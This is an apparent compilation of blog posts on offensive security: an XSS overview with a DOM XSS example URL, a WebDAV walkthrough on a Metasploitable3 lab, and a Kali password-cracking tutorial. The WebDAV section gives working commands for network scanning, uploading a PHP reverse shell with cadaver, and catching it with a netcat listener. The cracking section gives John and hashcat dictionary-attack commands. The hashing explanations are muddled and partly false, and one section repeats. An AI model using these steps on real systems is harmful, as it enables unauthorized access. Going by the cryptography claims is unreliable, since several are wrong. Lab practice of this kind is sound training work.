Example from Acunetix:
http://testhtml5.vulnweb.com/#/redir?url=javascript:alert("DOM XSS on: " + document.domain)

How To Prevent DOM-based Cross-site Scripting - Acunetix 2019

Stealing Cookies Using XSS

🛑 Malicious JavaScript: Understanding and Consequences

Malicious JavaScript refers to JavaScript code intentionally designed to compromise user security or cause harm during browsing sessions. Despite its limited environment within web browsers, JavaScript still holds access to sensitive user information and can manipulate webpage elements.

Consequences of Malicious JavaScript:

Cookie Theft: Accesses user's cookies associated with a website. Transmits stolen cookies to a remote server controlled by the attacker. Enables unauthorized access to sensitive information like session IDs.
Keylogging: Registers keyboard event listeners to capture user keystrokes. Sends captured keystrokes to a remote server. Facilitates the recording of sensitive information such as passwords and credit card numbers.
Phishing: Manipulates webpage HTML to insert fake login forms or deceptive elements. Redirects users to fake forms to capture their input. Tricks users into submitting sensitive information like login credentials or personal details.

🔚 Conclusion

Malicious JavaScript poses significant security risks, allowing attackers to exploit vulnerabilities and compromise user data. Vigilance and robust security measures are crucial to detect and mitigate the harmful effects of malicious code during browsing sessions.

🔒 Prevention Measures

To mitigate XSS vulnerabilities, implementing robust security measures is imperative:

Data Sanitization: Ensure all input and output data is properly sanitized to mitigate XSS risks.
Internationalization (I18n): Make web applications translation-ready using secure translation functions.
Escape Functions: Utilize escape functions when rendering dynamic content to prevent XSS vulnerabilities.

🛠️ Exploitation Techniques of XSS

Cybercriminals exploit XSS vulnerabilities to coerce web applications into executing malicious scripts, often by manipulating data input mechanisms such as forms or API endpoints.

⚠️ Ramifications of XSS Attacks

XSS attacks can result in significant damage by facilitating data theft, malware installation, and unauthorized access. They can tarnish a company’s reputation and lead to website defacement or dissemination of false information.

🧪 Test Examples

Various platforms offer avenues to test XSS vulnerabilities, providing valuable insights into potential security weaknesses and the effectiveness of mitigation strategies.

📚 References

Ensurtec - DVWA Part 2: Exploiting Cross-Site Scripting (XSS) Vulnerabilities
[Medium - Exploiting Stored XSS in Damn Vulnerable Web Application (DVWA)](https://medium.com/@hashsleuth.info/exploiting-stored-xss-in-damn-vw...
StackZero - Stored XSS DVWA
BrightSec - XSS Attack
Real-world examples of XSS attacks and how they were executed - Land2Cyber
Reflected XSS - Port Swigger
Stored XSS - Port Swigger
Excess XSS
Pentest-Tools - XSS Attacks Practical Scenarios

Reverse Shell on MetaSploitable3 Windows

And Go Web Solutions | AGWS — Thu, 01 Feb 2024 01:47:16 +0000

In-Depth Steps for WebDAV Exploitation

WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In this guide, we'll explore the process of exploiting a target with a vulnerable WebDAV service to gain remote access using a PHP reverse shell. This tutorial assumes you have the necessary permissions to perform penetration testing on the target network.

Information Gathering

Step 0: Check Router IP from eth0 on your Kali Machine

ip addr

Example Results:

inet 192.168.1.10/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0

Step 1: Quick arp-scan

arp-scan 192.168.1.1/24

Example Results:

192.168.1.3     02:f9:8e:69:9e:55       (Unknown: locally administered)
192.168.1.1     e0:19:54:46:e5:6e       zte corporation
192.168.1.11    08:00:27:e7:c3:e8       PCS Systemtechnik GmbH

Step 2: Nmap Scan for All Ports and OS Detection

nmap -Pn -T4 -vv -A -p1-65535 192.168.1.1/24 > /home/kali/Desktop/network-arp-scan.txt

Example Results:

Discovered open port 2869/tcp on 192.168.1.3
Discovered open port 7676/tcp on 192.168.1.11
Discovered open port 23/tcp on 192.168.1.1

// Also the open port 8585 for the WebDav 
PORT     STATE SERVICE REASON         VERSION
8585/tcp open  unknown syn-ack ttl 64

Nmap scan report for 192.168.1.11:

OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
TCP/IP fingerprint:

Step 3: Davtest for WebDAV

davtest -auth admin:password -sendbd -auto -url http://192.168.1.11:8585/uploads

Example Results:

Testing DAV connection
OPEN            SUCCEED:                http://192.168.1.11:8585/uploads

WebDAV Exploitation

Step 4: Copy PHP Reverse Shell to Desktop

cp /usr/share/webshells/php/php-reverse-shell.php /home/kali/Desktop

Step 5: Edit PHP Reverse Shell

Edit /home/kali/Desktop/php-reverse-shell.php:

$ip = '192.168.1.10';  // Kali machine IP
$port = 7779;           // TCP/UDP Port
$shell = 'cmd.exe';     // Use cmd.exe for Windows

Step 6: Start Netcat Listener on Kali

nc -lvnp 7779

Step 7: Upload PHP Reverse Shell Using Cadaver

cadaver http://192.168.1.11:8585/uploads
dav:/uploads/> put /home/kali/Desktop/php-reverse-shell.php

Step 8: Check Netcat Listener for Shell

nc -lnvp 7779

Now, you should have a reverse shell connection. Adapt the commands based on your specific scenario and environment.

Explanation:

Information Gathering:
- Step 0: Check the router IP to identify the local network's subnet.
- Step 1: Use arp-scan to discover active hosts on the network.
- Step 2: Perform an Nmap scan to find open ports and detect the operating system.
WebDAV Exploitation:
- Step 3: Use davtest to verify that the WebDAV service is accessible.
- Step 4: Copy a PHP reverse shell script to the attacker's machine.
- Step 5: Edit the PHP script with the attacker's IP and desired port.
- Step 6: Start a Netcat listener on Kali to receive the reverse shell connection.
- Step 7: Upload the modified PHP script to the target using Cadaver.
- Step 8: Check the Netcat listener for a successful reverse shell.

Remember to ensure ethical and legal use of penetration testing tools and techniques. Unauthorized access to computer systems is illegal and unethical. Always obtain proper authorization before performing penetration tests on any network.

Word lists ,Crunch, John and Hash Cat - All Kali Word List Tools Explained.

And Go Web Solutions | AGWS — Thu, 25 Jan 2024 22:30:00 +0000

🔐 Overview Of Wordlists ,Crunch, John and Hash Cat - All Kali Word List Tools Explained.🔐

Common Password Formats

Understanding password security is crucial, considering different encryption methods for a password like "R@nT4g*Ne!":

SHA-1:
- Output: 12bf203295c014c580302f4fae101817ec085949
- Characteristics: 40 characters, no clear decryption method.
SHA-1 with Salt:
- Output: bc6b79c7716722cb383321e40f31734bce0c3598
- Characteristics: 40 characters, with the addition of the word "Free."
MD5:
- Output: 4e84f7e8ce5ba8cdfe99d4ff41dc2d41
- Characteristics: Encoded into a 128-bit string.
AES (Advanced Encryption Standard):
- Characteristics: Utilizes a symmetric encryption algorithm with a variable bit length.

-- Encryption Algorithms

SHA-1-512 (-1-512) Stands for the buffer size when that increases the level of encryption is higher.

-- One Way Hash - Designed for cryptography

MD5 and MD4 example (Not Recommended to be Used Vulnerable).

Lets Checkout some commands basics.

Commands Basics

This command is used to generate an actual

echo -n "adminpassword" | sha1sum

Result :

bash efacc4001e857f7eba4ae781c2932dedf843865e

HashID is used to determine the type of hash
Create a new file called new.hash

touch new.hash

Use the nano text editor the copy the result above or create your own.

nano new.hash

Note : Inside nano to save the file press CTRL + X and then Y then ENTER To save the file .
Now use hashid to determine what hash type this file is using

hashid -m new.hash

Crunch The Command Used here Creates lists with every possible combination of number, you can also use crunch with uppercase and lowercase letters , special characters.

Syntax
Usage: crunch <min> <max> [options]

┌──(root㉿kali)-[~]
└─# crunch 1 3 0123456789 -O /home/kali/Desktop/phonepassword.txt

Optional Commands for testing
Its Optional (Requires alot of PC Resources).

┌──(root㉿kali)-[~]
└─# crunch 3 10 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ

Optional - Add generated list to already existing file like rockyou.txt

┌──(root㉿kali)-[~]
└─# crunch 1 3 0123456789 >> /usr/share/wordlists/rockyou.txt

1. Wordlists

Simply used to generate rockyou.txt and show Word List Files on Kali.

┌──(root㉿kali)-[~]
└─# wordlists

Result

/usr/share/wordlists
├── amass - /usr/share/amass/wordlists
├── dirb - /usr/share/dirb/wordlists
├── dirbuster - /usr/share/dirbuster/wordlists
├── fasttrack.txt - /usr/share/set/src/fasttrack/wordlist.txt
├── fern-wifi - /usr/share/fern-wifi-cracker/extras/wordlists
├── john.lst - /usr/share/john/password.lst
├── legion - /usr/share/legion/wordlists
├── metasploit - /usr/share/metasploit-framework/data/wordlists
├── nmap.lst - /usr/share/nmap/nselib/data/passwords.lst
├── rockyou.txt
├── rockyou.txt.gz
├── sqlmap.txt - /usr/share/sqlmap/data/txt/wordlist.txt
├── wfuzz - /usr/share/wfuzz/wordlist
└── wifite.txt - /usr/share/dict/wordlist-probable.txt

┌──(root㉿kali)-[~]
└─# cd /usr/share/wordlists // cd into wordlists directory 
┌──(root㉿kali)-[~]
└─# ls -la // list all directory items
┌──(root㉿kali)-[~]
└─# gunzip /usr/share/wordlists/rockyou.txt.gz //extracts rockyou.txt if not extracted already

2. John The Ripper

Always check the -h or --help option for any tool used on kali to check the syntax and options.

Review Options </>

┌──(root㉿kali)-[~]
└─#john --help

Check File Formats John Can Crack. </>

┌──(root㉿kali)-[~]
└─# john --list=formats // formats and protocols that can be used with john

┌──(root㉿kali)-[~]
└─#john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1 --fork2 SHA1.txt

┌──(root㉿kali)-[~]
└─#john --show --format=Raw-SHA1 SHA1.txt

The Same commands apply for SHA224, SHA256, MD5, MD4 for example and the check the formats that john support with the command provided in the above.

3. HashCat - Advanced Password Cracker

Utilizes markov statistical theory A russian scientist - with AI.🤖
Check PassGAN

🔑 Core Attack Modes 🔑

Dictionary Attack - Tries all words in a list, also known as "straight" mode. (Attack mode 0, -a 0)
Combinator Attack - Concatenates words from multiple wordlists. (-a 1)
Brute-force Attack and Mask Attack - Tries all characters from given charsets, per position. (-a 3)
Hybrid Attack - Combines wordlists with masks (-a 6) and masks with wordlists (-a 7); can also be done with rules.
Association Attack - Uses additional information like a username, filename, or hint to attack a specific hash. (-a 9)

4. MSF/WordLists

Check MetaSploit WordLists

ls -lh /usr/share/metasploit-framework/data/wordlists/

Common Password Formats

Understanding password security is very important, with various tools transforming passwords in distinct ways. Let's consider the password "R@nT4g*Ne!" (Rent Forgone, in common terms) and observe its transformation through different encryption methods:

SHA-1:

Output: 12bf203295c014c580302f4fae101817ec085949
Characteristics: 40 characters, no clear decryption method.
SHA-1 with Salt:

Output: bc6b79c7716722cb383321e40f31734bce0c3598
Characteristics: Still 40 characters, with the addition of the word "Free."
MD5:

Output: 4e84f7e8ce5ba8cdfe99d4ff41dc2d41
Characteristics: Encoded into a 128-bit string.
AES (Advanced Encryption Standard):

Characteristics: Utilizes a symmetric encryption algorithm with variable bit length.
Note: The outcome of AES encryption is highly variable, depending on factors like bit length, making it nearly impossible to predict the final password representation.
In summary, these encryption methods offer different levels of security and characteristics, with varying degrees of complexity and resistance to decryption.

References

🔗Kali Linux Wordlist: What you need to know
🔗crunch
🔗WordLists - Kali-Tools
🔗WordLists - GitLab - repository
🔗John - Kali-Tools .
🔗Openwall -github repository -John
🔗John-The-Ripper-Tutorial - Techy Rick
🔗Openwall -John - Offical Website .
🔗Hash Cat - Wiki
🔗Cap 2 Hashcat
🔗Markov - Chain
🔗Hash Cat - Forums
🔗Security Stack Exchange - Question 260773
🔗StationX - How to use Hashcat
🔗MSF/Wordlists - charlesreid
🔗MSFConsole
🔗How to use hashcat
🔗MSF/Wordlists - charlesreid1
🔗Where do the words in /usr/share/dict/words come from?
🔗SCOWL (Spell Checker Oriented Word Lists)
🔗The spell utility -spell - find spelling errors (LEGACY) - UNIX
What are Different Types of Cryptography?
sha1-vs-sha2-the-technical-difference-explained-by-ssl-experts/
🔗password-encryption
🔗Secure-Programs
SHA-1
🔗What-are-computer-algorithms
🔗What Are MD5, SHA-1, and SHA-256 Hashes, and How Do I Check Them? - howtogeek.com
🔗kali-linux-wordlist-what-you-need-to-know

Johnny
Openwall -info wiki -Johnny
Openwall -github repository -Johnny